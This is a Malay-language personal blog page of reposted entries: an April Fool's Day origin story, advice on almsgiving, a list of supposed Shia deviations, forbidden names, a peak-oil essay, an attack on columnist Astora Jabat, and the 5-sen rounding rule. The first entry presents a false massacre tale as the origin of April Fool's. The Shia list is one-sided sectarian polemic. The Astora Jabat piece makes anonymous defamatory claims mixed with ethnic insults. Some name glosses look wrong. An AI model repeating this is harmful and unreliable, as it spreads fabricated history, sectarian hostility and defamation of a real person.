berkurun-kurun lamanya di Granada, Sepanyol, kerajaan Islam akhirnya
runtuh diserang tentera-tentera Kristian.

Penduduk-penduduk Islam diSepanyol (Moors) terpaksa berlindung di dalam
rumah masing-masing untuk menyelamatkan diri. Tentera-tentera Kristian
bagaimanapun tidak berpuas hati dan berusaha untuk menghapuskan
orang-orang Islam dr Sepanyol.


Penduduk-penduduk muslim ini, diberitahu bahwa mereka boleh berlayar
keluar dari Sepanyol dengan selamat bersama-sama barang-barang keperluan
mereka dengan menggunakan kapal-kapal yang berlabuh dipelabuhan.
Orang-orang Muslim yang risau sekiranya tawaran tersebut merupakan suatu
penipuan, telah pergi keperlabuhan untuk melihat kapal-kapal yang
dimaksudkan.

Setelah berpuas hati, mereka membuat persiapan untuk bertolak. Keesokan
harinya (1April), mereka mengambil semua barangan yang telah disiapkan
menuju ke perlabuhan.

Pada masa inilah pihak Kristian mengambil kesempatan untuk menggeledah
dan kemudian membakar rumah penduduk-penduduk Islam ini.

Mereka juga tidak sempat untuk menaiki kapal kerana semuanya dibakar.
Pihak Kristian kemudiannya menyerang kaum muslim dan membunuh
kesemuanya, lelaki, perempuan, serta anak-anak kecil. Peristiwa berdarah
yang menyedihkan ini kemudiannya diraikan oleh tentera Kristian.

Keraian ini akhirnya dirayakan setiap tahun bukan sahaja di Sepanyol
tetapi juga di serata dunia.

Yang menyedihkan, orang-orang Islam yang jahil mengenai peristiwa ini
turut meraikan April Fool's Day tanpa menyedari mereka sebenarnya
merayakan ulang tahun pembunuhan beramai-ramai saudara seIslam mereka
sendiri.

Semoga Allah sentiasa membuka pintu taubat untuk kita.


Petikan drpd Risalah Fikrah
Peliharalah Allah, nescaya Allah akan memelihara kamu
.....rawahuttirmizi Illal Liqaq .
Read More

Rezki jadi luas kalau....

Assalamualaikum Semua...
Teman dapat nie dari kawan kepada kawan ..kawan..kawan. .. teman ... moga kita dapat manfaat bersama.

Saya teringat pesan rakan saya seorang yang berjaya. Katanya: "Kalau kau rasa kau kesempitan rezeki, duit tak cukup, harta rasa tak banyak, masa itulah masa paling sesuai untuk bersedekah." Dia menyambung "Kalau kau sudah senang setelah sempit, banyakkan lagi sedekah kau itu pada masa tersebut. Nescaya Allah akan meluaskan pintu rezeki"

Saya berpegang pada pesanan ini. Setiap kali saya sempit, bila buka wallet ada rm2 saya sedekahkan rm1. Kalau ada rm40 saya sedekahkan rm10. Kalau ada lebihan saya sedekahkan sedikit. Kalau ada rakan susah nak pinjam duit, saya pinjamkan dengan niat kalau dia bayar alhamdullilah, kalau tak saya anggap saya sedekah. Alhamdullilah, rezeki Allah permudahkan setakat ini dan harapnya pada masa akan datang. Itu juga amalan kawan saya.

Pernah suatu hari rakan saya seorang jurutera baru sahaja accident kereta. Dalam masa yang sama kena saman polis. Lepas tu duit dia hilang. Kena pulak sakit pergi hospital dan keluar beberapa ribu. Saya pesan kat dia, mungkin Allah nak pesan agar dia memberi sedikit harta yang Allah berikan kat dia. Alhamdullilah lepas dia bersedekah, saya nampak kehidupan dia nampak mudah dan rezeki dia nampak luas.

Tapi kita kena ingat. Rezeki luas tak bermakna akan jadi kaya raya terus. Kadang, bak kata mak saya, rezeki luas nie macam makan seperti biasa, tapi rasa lebih kenyang dan puas. Gaji seperti biasa, tapi seolah-olah cukup. Dan paling utamanya kadang-kadang bantuan datang dari sumber yang kita sendiri tak sangka.

"Dan apa saja harta yang baik yang kamu nafkahkan (di jalan Allah), maka pahalanya itu untuk kamu sendiri. Dan janganlah kamu membelanjakan sesuatu melainkan kerana mencari keredaan Allah (ikhlas). Dan apa saja harta yang baik yang kamu nafkahkan, nescaya kamu akan diberi pahalanya dengan cukup, sedangkan kamu sedikit pun tidak akan dianiaya."
(Surah al-Baqarah, ayat 272).

Dalam riwayat Ibnu Hibban dan Hakim dari ' Uqbah ia mendengar Rasulullah bersabda, "Setiap orang bernaung di bawah perlindungan sedekahnya hingga ditetapkan hisab (perhitungan) di antara manusia di yaumil akhirat."

saya bukan yg terbaik utk memberikan nasihat hanyalah sekadar memperingatkan sesama insan betapa Maha Pengasihnya Allah kepada hamba-hambaNya yang bertaqwa???.

Sekadar utk berpesan. Semoga ada manfaat.
Read More

Fahaman Syiah

untuk informasi bagi yang mencari apa itu fahaman syiah...

Fahaman Syiah


ISI AJARAN :
A. Penyelewengan Dari Sudut Akidah
  1. Imam adalah ma'sum.
  2. Kemunculan semula Imam Mahdi dan kumpulan orang yang telah mati untuk memberi keadilan.
  3. Berpura-pura.
  4. Saidina Ali disamatarafkan dengan Allah SWT
  5. Menghalalkan nikah Mut'ah.
  6. Khalifah diwasiatkan secara Nas.
  7. Ilmu Allah berubah-ubah mengikut sesuatu peristiwa yang berlaku kepada manusia.
  8. Muhamad bin Hassan al-Askari ialah Imam Mahdi ali-Muntazar.
  9. Mengkafirkan para sahabat Rasulullah SAW
  10. Menambah kalimah syahadah.
  11. Menolak hadith yang diriwayatkan oleh ahli sunnah wal jamaah sekalipun hadith Mutawatir.
B. Penyelewengan dari Sudut Syariat
  1. Menolak Ijmak Ulama.
  2. Menolak Qias.
  3. Mengamalkan Nikah Mut'ah.
  4. Menolak 'aul dan mendahulukan Qurabah dari Asobah dalam masalah Pusaka.
  5. Menuduh Abu Bakar, Umar, Uthman dan Muawiyah sebagai empat berhala Quraisy serta pengikut-pengikut adalah musuh Allah.
  6. Hanya Ali menghimpun al-Quran dengan sempurna.
C. Pelbagai Penyelewengan Umum
  1. Menziarahi kubur Saidina Hussain, ganjaran syurga.
  2. Menyiksa tubuh badan sempena 10 Muharram.
  3. Menghina Abu Bakar dan Umar serta dua orang isteri Nabi SAW iaitu Saidatina Aishah dan Hafsah.
  4. Mengharuskan jamak sembahyang dalam semua hal.
  5. Sembahyang Dhuha adalah haram.
  6. Menetapkan prinsip khumus sebagai kadar zakat.
  7. Imamah dan Khalifah daripada rukun Islam dan ianya berlaku melalui nas.
  8. Islam bukan syarat wajib haji.
  9. Wajib menyapu kedua-dua kaki dan tidak memadai basuh pada kedua-duanya.
Read More

Nama-nama Dilarang dalam Islam

Abkam
=
Tidak celik, buta
Abiqah
=
Hamba yang lari dari tuannya
Afinah
=
Yang bodoh
Asyar
=
Paling jahat
Asyirah
=
Yang tidak bersyukur atas nikmat
Amah
=
Hamba suruhan perempuan
Baghiah
=
Yang zalim, jahat
Bahimah
=
Binatang
Balidah
=
Yang bodoh, bebal
Bakiah
=
Yang menangis, merengek
Baqarah
=
Lembu Betina
Batilah
=
Yang batil, tidak benar
Dabbah
=
Binatang
Dahriyah
=
Yang mempercayai alam wujud dengan sendirinya
Dahisyah
=
Goncang, stress
Darakah
=
Kedudukan yang rendah
Daniyah
=
Yang lemah dan hina
Dami'ah
=
Yang mengalir air matanya
Fasidah
=
Yang rosak, yang binasa
Fasiqah
=
Yang jahat, si fasik
Fasyilah
=
Gagal, kalah
Fajirah
=
Yang jahat, yang berdosa
Faji'ah
=
Kecelakaan
Ghafilah
=
Yang lalai, yang leka
Ghailah
=
Kecelakaan, bencana
Ghaibah
=
Hilang
Ghasibah
=
Perampas, perompak
Ghamitah
=
Yang tidak mensyukuri nikmat
Ghawiah
=
Yang sesat, yang mengikut hawa nafsu
Haqidah
=
Yang dengki
Hasidah
=
Yang hasad
Hazinah
=
Yang sedih
Huzn
=
Kesedihan
Khabithah
=
Yang jahat, yang keji
Khali'ah
=
Yang tidak segan silu, mengikut hawa nafsu
Khati'ah
=
Yang bersalah, yang berdosa
Khasirah
=
Yang rugi
Khamrah
=
Arak
Jariah
=
Hamba suruhan perempuan
Jafiah
=
Yang tidak suka berkawan
Kaibah
=
Yang sedih
Kafirah
=
Yang kafir, yang ingkar
Kamidah
=
Yang hiba, yang sangat berduka
Kazibah
=
Pendusta, pembohong
Lahab
=
Bara api
Laghiah
=
sia-sia, tidak berfaedah
La'imah
=
Yang tercela
Lainah
=
Yang terkutuk
Lahifah
=
Yang sedih, menyesal dan dizalimi
Maridah
=
Yang menderhaka
Majinah
=
Yang bergurau senda tanpa perasaan malu
Majusiah
=
Agama menyembah api atau matahari
munafikah
=
Yang munafik
Musibah=Celaka, bencana, kemalangan
Nariah=Api
Nasyizah=Yang menderhaka dan melawan suami
Najisah=Yang najis dan kotor
Qabihah=Yang buruk, hodoh
Qatilah=Pembunuh
Qasitah=Yang melampaui batasan dan menyeleweng dari kebenaran
Qazurah=Kejahatan, perzinaan
Rajimah=Yang direjam, yang dilaknat
Razi'ah=Kecelakaan, musibah
Razilah=Yang keji dan hina
Sakitah=Yang jatuh, yang hina, yang jahat
Safilah=Yang rendah dan hina
Sahiah=Yang pelupa
Sakirah=Pemabuk
Syafihah=Yang bodoh
Syaridah=Yang diusir
Syaqiyah=Yang menderita
Syarrul Bariyyah=Sejahat-jahat manusia
Syani'ah=Yang buruk
Syarisah=Yang buruk akhlak
Syatimah=Maki hamun
Syariqah=Pencuri
Talifah=Yang rosak, yang binasa
Tarbiyah=Yang papa kedana
Tarikah=Anak dara tua
Tafihah=Karut
Talihah=Yang tidak baik
Yaisah=Yang berputus asa
Yabisah=Yang kering, yang sedikit kebaikannya
Wahinah=Penakut
Waqihah=Yang kurang sopan dan malu
Wasikhah=Yang kotor
Wasyiah=Yang mengumpat, yang mengadu dombakan orang
Wahimah=Yang lemah
Wahiah=Yang lemah, yang jatuh, yang buruk
Wajilah=Penakut
Wailah=Bencana, keburukan
Waqi'ah=Pertempuran dalam peperangan, umpatan
Zalijah=Kebinasaan
Zalilah=Yang hina
Zalimah=Yang zalim
Zaniyah=Penzina, pelacur
Zufafah=Racun pembunuh
Read More

Tamadun Petroleum

Kalo aku kata petroleum kat perut bumi ni semakin susut ko percaya?
pasni tamadun nuklear pula.. ko percaya?
mencari bahan bakar..

aku letak petikan forum di ehoza.
best gak ehoza nih.. matang aje suma..

rujukan : More>>>

Satu ulasan yang menarik utk dibaca dan difikirkan... no wonder Iran dah
start buat nuklear powerplant walaupun US tekan die, orang yang jenis
berfikir, camtur ler...

Sejak hampir lima tahun yang lalu saya telah menulis secara konsisten
tentang masalah bahan bakar minyak petroleum. Secara jujur saya telah cuba
menyedarkan seramai mungkin warga untuk memahami satu hakikat: minyak
dalam dunia ini telah susut. Banyak telaga minyak telah kering. Minyak
yang telah dibakar tidak akan ada penggantiannya.

Saya juga telah mendedahkan dan cuba menerangkan apa yang dipanggil PEAK
OIL THEORY/TEORI PUNCAK MINYAK. Teori ini mengajukan pandangan bahawa pada
satu jangka masa pengeluaran hasil bahan bakar petroleum berkembang tinggi
hingga sampai ke satu puncak. Sesudah sampai ke puncak ini maka
pengeluaran bahan bakar ini akan terus menurun berkurangan.

Teori ini diasaskan oleh M.King Hubbert pada tahun 1956. Berdasarkan teori
ini, M. Hubbert telah meramalkan di antara tahun 1965 ke 1970 pengeluaran
bahan bakar petroleum di Amerika Syarikat akan sampai ke puncak. Apabila
mencecah puncak ini maka pengeluaran galian petrol di Amerika akan terus
berkurangan. Ramalan Hubbert ini cukup tepat. Pada tahun 1970, Amerika
wajib menjadi negara pengimport minyak.

Teori Puncak Minyak ini juga telah meramalkan banyak negara-negara
pengeluaran minyak dalam dunia ini telah melintas puncaknya. Mesir: 1987,
Perancis: 1988, Jerman: 1966 Iran: 1974, India: 1997, Indonesia: 1991,
Jepun: 1932 , Libya: 1970, Mexico: 2003,New Zealand: 1997, Nigeria: 1979,
Norway: 2000, Oman: 2000, Russia: 1987,Syria: 1996 ,Tobago:
1981,Venezuela: 1970, UK: 1999 dan Amerika Syarikat: 1970. Ada di antara
negara ini masih lagi mengeluarkan minyak tetapi dari tahun ke tahun
jumlah tong yang di hasilkan semakin kurang.

Hubbert Peak Theory tidak pernah dipertikaikan. Apa yang selalu
ditimbulkan hanya perbezaan tarikh. Ada geologis yang telah menyatakan
bahawa dunia telah melintasi zaman puncak minyak pada tahun 2005 yang
lalu. Ada pula yang meramalkan bahawa puncak minyak akan sampai di antara
tahun 2020 ke tahun 2030. Tetapi pada hakikatnya semua pakar geologis ini
menerima pakai bahawa bahan bakar ini semakin susut, berkurangan
pengeluaran dan akhir akan habis. Ini bermakna akan berakhirlah Tamadun
Petroleum.

Habis di sini bukan bermakna tidak ada lagi minyak dalam perut bumi. Zaman
Batu berakhir bukan bermakna batu telah habis. Minyak masih ada dalam bumi
tetapi tidak lagi ekonomik untuk mengambilnya keluar. Minyak ialah tenaga.
Akan sampai masanya nanti untuk mengeluarkan satu tong minyak dari perut
bumi kita memerlukan membakar lima atau sepuluh tong minyak. Ini tidak
berbaloi dan tidak ekonomik.

Pada pagi 2hb Januari 2008 harga satu tong bahan bakar petroleum telah
mencecah 100 dolar di pasaran dunia. Pada petangnya harga telah menurun
sedikit. Ketika saya menulis ini harga satu tong ialah 99.68 dolar. Saya
tidak terperanjat apabila melihat harga minyak naik menjadi 100 dolar
untuk satu tong. Dalam tulisan tulisan saya yang lalu saya juga telah
beberapa kali meramalkan harga bahan bakar ini akan terus naik.

Apa yang memeranjatkan saya ialah kenyataan yang keluar dari Parti
Keadilan Rakyat yang menyatakan jika parti ini memerintah maka harga
minyak akan diturunkan. Untuk saya ini hanyalah kenyataan orang yang tidak
tahu tentang Teori Puncak Minyak dan tidak sedar bahawa tamadun dunia hari
ini adalah Tamadun Petroleum.

Harga minyak

Sama juga dengan susulan jawapan dari Najib Razak seorang pemimpin dari
parti United Malay National Organisation. Najib mengatakan negara ini akan
bankrap jika harga minyak diturunkan. Orang yang bernama Najib ini tidak
sedar semenjak bila pula negara kita ini tidak bankrap.

Susuk-susuk yang mengeluarkan kenyataan ini tidak memahami tanda dan makna
perang di Iraq, perang di Darfur atau perang di Sudan. Mereka juga tidak
membaca dan memahami makna ‘war on terrorism’ sebagai dasar luar negara
Amerika Syarikat. Mereka juga tidak memahami kenapa Hamid Karzai menjadi
penghulu di Kabul. Atau kenapa ada sebuah kapal minyak yang bernama
Condoleezza Rice.

Kedua-dua kumpulan parti politik ini tidak memahami bahan bakar petroleum.
Mereka ini adalah sesat lagi menyesatkan. Kedua-dua kumpulan ini TIDAK
jujur. Mereka adalah politikus yang hanya bercita-cita untuk berkuasa
tetapi tidak memiliki apa-apa di antara dua telinga mereka. Cakap mereka
itu bertujuan memancing undi dan mencari untung politik jangka pendek.

Dalam agenda bahan bakar minyak saya menolak kedua-dua kenyataan tersebut.
Mengikut pandangan parti Keadilan jika United Malay National Organisation
telus dalam memberikan perincian perbelanjaan dan pendapatan dari syarikat
Petronas maka harga minyak akan dapat ditampung. Jika tidak ada pembaziran
dari duit jualan minyak maka harga minyak akan terus dapat disubsidi.

Parti Keadilan tidak sedar dalam masa tidak lebih dari 10 tahun bahan
bakar minyak di persisiran laut kita akan habis. Untuk berhujah, kita
anggaplah mereka dapat mengambilalih kerajaan. Dalam penggal ke-3
pentadbiran Barisan Rakyat minyak habis. Barisan Rakyat adalah satu
pentadbiran yang telus, tidak rasuah dan jujur. Bila minyak habis, mereka
juga tidak dapat tidak akan menaikkan harga minyak. Ini hukum yang
saintifik. Jadi cakap-cakap harga minyak hendak diturunkan itu, tidak
mungkin dapat dilakukan.

Kenaikan harga bahan bakar minyak ini tidak ada sangkut paut dengan
ketelusan kerajaan atau terpaparnya secara terperinci pendapatan dari
Petronas. Harga minyak naik kerana minyak dalam dunia ini telah habis.
Kenapa sukar sangat untuk memahami hakikat ini.

Kerajaan dalam bentuk apa sahaja – komunis, sosialis, kapitalis, Marxis,
Anarkis, Geuvarist, Stalinist, Sosial Demokrat, Islamik, Syiah, Demokrat,
Katholikus, Sembahyangist, Hindu, Buddha - kerajaan ada agama, tak ada
agama, kerajaan rasuah, kerajaan telus lagi jujur, kerajaan alim lagi
warak – semuanya akan menaikkan harga minyak. Inilah yang wajib
diterangkan kepada orang ramai secara telus dan jujur.

Maklum pada orang ramai

Juga wajib diterangkan kepada orang ramai:

Hari minyak habis dalam dunia ini akan sampai. Apabila minyak habis ia
akan membawa bencana besar dan huru-hara terutama negara yang banyak
bergantung pada minyak. Kehabisan minyak akan sampai seperti kereta kita
kehabisan minyak. Masanya datang serta merta dengan tiba-iba. Yang paling
teruk kena bantai apabila minyak habis ialah semua hal ehwal pengangkutan.

Untuk meredakan keadaan minyak habis yang datang secara mendadak kita
memerlukan dan mengambil masa untuk membuat persediaan. Kerana itu
pemimpin kerajaan dan politikus dari semua kumpulan wajib membaca Peak Oil
Theory. Kesedaran minyak akan habis wajib diberitahu kepada orang ramai
sekarang.

Sekurang kurangnya 20 tahun diperlukan oleh kerajaan untuk membuat
persediaan berhadapan dengan hari minyak habis. Kerajaan, industri dan
para pengguna wajib sama-sama memahami hakikat ini. Tidak dapat tidak akan
berlaku kacau bilau, bukan sahaja di Malaysia malah di seluruh dunia
apabila minyak habis.

Saya tidak nampak satu dasar penggunaan bahan bakar petroleum yang tepat
dan betul yang sedang diajukan baik dari parti kerajaan ataupun dari
Barisan Rakyat. Semua dasar yang mereka ajukan adalah dasar jangka pendek
yang digunapakai untuk menipu rakyat. Subsidi atau menaikkan harga bukan
jawapan untuk berhadapan dengan zaman kehabisan minyak.

Saya mengajukan satu perubahan struktur budaya hidup yang baru. Mengubah
secara struktural dan meninggalkan gaya hidup yang kita guna pakai hari
ini. Budaya konsumer dalam tamadun petroleum ini telah nazak dan wajib
ditinggalkan.

Orang ramai wajib digalakkan dari hari ini untuk tidak menggunakan kereta
persendirian dan beralih kepada sistem pengangkutan awam. Basikal perlu
digunakan kembali seperti di zaman ayah dan datuk kita membesar. Hentikan
kilang-kilang yang pengeluaran produk-produk yang tidak berguna dan bukan
asas untuk hidup.

Kota dan bandar kita wajib dapat menampung dan mengeluarkan bahan makanan
sendiri. Makanan tidak perlu diambil dari kawasan yang jauh atau diimport.
Setiap warga wajib tahu hal pertanian. Tanaman yang diusahakan untuk
makanan dan bukan untuk spekulasi mengumpul modal. Siapa bertanam maka
mereka dapat makan.

Tempat kita bekerja pula tidak harus jauh dari tempat kita tinggal.
Rumah-rumah yang kita dirikan bukan gua-gua batu yang memerlukan alat hawa
dingin. Rumah adalah tempat kita berteduh dari hujan dan panas – kembali
kepada asas. Penggunaan kuasa leterik dalam bangunan dan dalam rumah kita
seharusnya pada asas yang paling minimum. Kota-kota kita tidak perlu
disaluti dengan lampu neon yang mengiklankan hampeh-hampeh dan membazirkan
tenaga leterik. Minyak, gas dan arang batu yang tidak miliki wajib dijaga
dan di pergunakan dengan cermat.

Ekonomi yang berasaskan dolar wajib kita tinggalkan sekarang. Dolar adalah
simbol tamadun petroleum. Semenjak tahun 1970-an bilamana Amerika dan
Saudi Arabia menjadi sahabat karib maka dunia telah dipaksa menggunakan
dolar dalam hal jual beli minyak. Kita semua dan rakyat dunia telah ditipu
dengan kertas hijau yang dicetak oleh Amerika. Kertas hijau ini tidak
memiliki apa apa nilai dan zat untuk dimakan. Malah kertas jamban lebih
bernilai dan boleh digunakan berbanding dengan dolar Amerika.

Sekali pandangan apa yang saya ajukan ini sebagai cakap yang TIDAK masuk
akal. Ianya tidak masuk akal kerana apa yang saya nyatakan ini dibaca
dalam tahun 2008. Bayangkan pada tahun 2020 atau tahun 2025 , berapa dolar
agaknya harga satu tong petroleum? Bayangkan juga sepuluh tahun dari hari
ini apabila telaga minyak kita kering. Dari mana hendak dicari dana
subsidi untuk menampung pengurangan harga minyak?

Kepada semua politikus dari semua parti politik sila kaji dan fahami
tentang Tamadun Petroleum dan kajian teori M. King Hubbert. Jangan menjadi
pemalas. Jika tidak tahu apa yang saya tulis ini sila tanya Pak Cik saya
Lebai Google.

Rujukan:-
http://en.wikipedia.org/wiki/Hubbert_peak_theory
Read More

Kisah Asan anak To' Rambai aka ASTORA JABAT

Kuala Lumpur : Penulis ruangan agama akhbar Utusan Malaysia yang paling kontroversi Astora Jabat, telah difatwakan sesat oleh Majlis Agama Islam Johor (MAIJ) sekali gus dilarang atau dinasihatkan supaya berhenti menulis perkara-perkara yang berkaitan hukum hakam Islam. Menurut sumber MAIJ, fatwa tersebut dikeluarkan berikutan tulisan-tulisan Astora, atau nama sebenarnya Asan anak To' Rambai dari kampung Jabat Narathiwat selatan Siam, amat mengelirukan, sesat lagi menyesatkan.

Astora, seorang wartawan yang bias, berkepentingan dan penjilat, sebelum ini dalam tulisannya telah mengatakan Firaun ada yang baik dan ada yang jahat. Selain Nabi Musa a.s. yang dianggapnya sebagai Firaun, beliau menamakan Dr. Mahathir sebagai Firaun baik. Di atas ketelanjurannya itu, apabila diasak diminta bukti siapakah Firaun baik di sepanjang sejarah, beliau hanya memberi contoh Laith Pharaon, seorang juara lumba bot laju dari Arab Saudi sebagai Firaun baik. Astora juga dalam tulisannya pernah membahagikan hukum aurat wanita kepada mughallazah dan mukhaffafah (seperti pembahagian hukum najis dalam fiqah).

Menurut seorang guru agama, pengdapat dangkal Astora itu tidak pernah dibicarakan langsung sejak zaman Imam Syafie, Imam Ghazali, hinggalah para ulama Islam kini. Seorang wartawan yang mendakwa rapat dengannya memberi tahu,, "hujah 'pakai hentam' beliau itu hanyalah sekadar untuk menghalalkan perlakuan isteri beliau berbangsa Morocco yang tidak pernah menutup aurat sebagaimana seorang wanita Islam". Tuliasn Astora yang sangat merbahaya ialah pendapat beliau yang menyokong ISA. Demi untuk mengampu, beliau sanggup membuat fitnah yang sangat dahsyat apabila mengatakan bahawa Nabi Muhammad SAW menggunakan ISA (akta keselamatamn dalam negeri) untuk membendung pengganas.

Pendapat terbaru beliau ialah cadangannya agar dihapuskan sekolah beraliran agama. Seorang bekas pemberita akhbar Utusan menyatakan, "kita harus faham bahawa Astora ini berasal dari bangsa Patani yang hidup merempat, tertindas dan sentiasa hidup dalam buruan di bawah kerajaaan Budha Siam. Apabila dia beroleh sedikit kesenangan bekerja di sini, umpama anjing peliharaan, dia akan menyalak apa saja untuk menghiburkan tuannya", ujarnya.

Seorang bekas pelajar Universiti AlAzhar Mesir pula merasa hairan bagaimana Astora dibenarkan oleh majikannya untuk menulis berkaitan agama Islam. "Ketika berada di Mesir satu masa dulu, dia hanya bekerja sebagai koresponden akhbar saja. Dia tidak pernaha belajar ilmu Islam secara formal. Saya tahu sebab saya kenal dia. Dia memang banyak membaca termasuk buku-buku tulisan orientalis barat dan musuh Islam". Astora pernah pergi ke Pakistan baru-baru ini untuk membuat liputan sempena serangan ganas Amerika terhadap Afghanistan. Dia dipercayai berada di sana untuk berusaha mengada-adakan bukti bagi mensabitkan Taliban dengan Pergerakan Islam di Malaysia. Bagaimana pun beliau pulang lebih awal ke tanah air kerana merasa khuatir keselamatan dirinya.

Mengenai usaha beliau sekarang yang bersungguh-sungguh dalam tulisan di ruangannya mengulas wawancara rangkaian televisyen Alzajeeera dengan Menteri Besar Terengganu Datu seri Abdul hadi Awang, seorang pemerhati menyatakan, "Astora sebenarnya sudah dilarang dari menulis perkara-perkara berkaitan hukum Islam. Jadi dia memilih untuk menjadi jaguh dengan mengkritik beberapa tokoh agama dengan harapan tulisan beliau akan mendapat perhatian meski pun dia tahu benar bahawa hujahnya hanya akan diketawakan orang"' ujarnya.

Mengenai penyiaran email pembaca di ruangan ugama beliau yang diformatkan seperti debat, seorang stringer Utusan Malaysia berkata, "email pembaca yang disiarkan itu hanya rekaan dia sendiri. Tiada orang yang sudi melayan penulis seumpama itu. Email yang direka dan jawaban darinya itu sebenarnya hanyalah teknik penulisan". Sementara itu, Astora jabat yang bertubuh agak tinggi dan berkulit hitam itu tahun lalu telah disuakan dengan Ustaz Asri Zainal Abidin di dalam satu majlis debat di Pulau Pinang. Malangnya tidak selancar tulisannya, beliau dimalukan sebegitu rupa depan khalayak dengan pertuturan yang tergagap-gagap, hujah yang merapu dan keadaaannya yang kelihatan menggeletar dan keresahan. Video tentang sesi debat itu boleh didapatkan di pasaran.

Seorang saksi yang mendakwa pernah mengikuti majlis ceramah Astora di KL, Kuantan dan beberapa tempat lagi memberi tahu, "selalunya soalan yang ditanyakan hadirin dalam sesi soal jawab tidak pernah dijawab dengan tepat melainkan di luar persoalan, merapu dan berhujah dangkal", ujarnya.

dipetik dari forum ehoza dan dipetik lagi dari utusan katanya
Read More

Jimat dan senang kira: mekanisme penggenapan

pernahkah anda terfikir bahawa 1 sen itu adalah nilai matawang..
oh.. lupa anda ini pemurah.. maka apalah sangat satu sen tu..
mulai hari ini.. anda tanam niat sedekah duit tu..
untuk memantapkan ekonomi..

Kerajaan Malaysia mengumumkan pengenalan Mekanisme Penggenapan kepada 5 sen terdekat untuk semua pembayaran yang dibuat di kaunter pembayaran berkuat kuasa sepenuhnya pada 1 April 2008.

Mekanisme Penggenapan ini diterima pakai untuk jumlah keseluruhan bil dan bukan bagi setiap unit barangan. Dalam pelaksanaan Mekanisme Penggenapan ini, jumlah keseluruhan bil, yang berakhir dengan 1, 2, 6 dan 7 sen akan diturunkan kepada 5 sen yang terdekat, manakala 3, 4, 8 dan 9 sen akan dinaikkan kepada 5 sen yang terdekat.
Pelaksanaan Mekanisme Penggenapan ini memberikan faedah kepada peniaga dan pelanggan. Para peniaga akan dapat mengurangkan kos pengendalian manakala bagi para pelanggan, pembayaran akan dapat dibuat dengan lebih cepat dan lebih mudah.
Jadual di bawah menggambarkan bagaimana Mekanisme Penggenapan dilaksanakan:
Bil berakhir dengan senPenggenapan kepada 5 sen terdekatJumlah Keseluruhan Bil
Jumlah keseluruhan bil sebelum penggenapan (RM)Jumlah keseluruhan bil selepas penggenapan (RM)
1,2Turun82.01
82.02
82.00
3,4Naik82.03
82.04
82.05
6,7Turun82.06
82.07
82.05
8,9Naik82.08
82.09
82.10
Garis Panduan Mekanisme Penggenapan
  1. Jumlah keseluruhan bil (termasuk barangan dan perkhidmatan yang dikenakan cukai) yang berakhir dengan 1, 2, 6 dan 7 sen akan diturunkan kepada 5 sen terdekat dan 3, 4, 8 dan 9 sen dinaikkan kepada 5 sen terdekat.
  2. Mekanisme Penggenapan ini diterima pakai untuk semua pembayaran yang dibuat di kaunter tanpa mengira jenis pembayaran sama ada tunai atau bukan tunai. Mekanisme ini tidak diterima pakai bagi pembayaran secara dalam talian.
  3. Jadual Mekanisme Penggenapan hendaklah dipamerkan di kaunter pembayaran bagi memastikan pengguna dimaklumkan cara penggenapan dilakukan.
  4. Resit perlu menunjukkan jumlah keseluruhan bil sebelum dan selepas penggenapan dilakukan.
  5. Duit syiling 1 sen masih sah diperlakukan.
Maklumat

Maklumat lanjut boleh didapati di laman web Kementerian Perdagangan Dalam Negeri dan Hal Ehwal Pengguna (KPDNHEP)( www.kpdnhep.gov.my) dan laman web Bank Negara Malaysia (www.bnm.gov.my) atau melalui telefon di talian 1-800-886-800 (KPDNHEP) atau 1-300-88-5465 (Bank Negara Malaysia).
Atau melalui emel di 1sen@bnm.gov.my.

nampaknya anda kena bijak mengambil peluang untuk mendapat nilai unutng..
bayar bil pun berniaga maaa.. tapi untung kecil sahaja..
dalam 0.0xsen
Read More

Recent Post

© 2011 ~Menempuh Arus Masa-Life-Photography~, AllRightsReserved.

Designed by ScreenWritersArena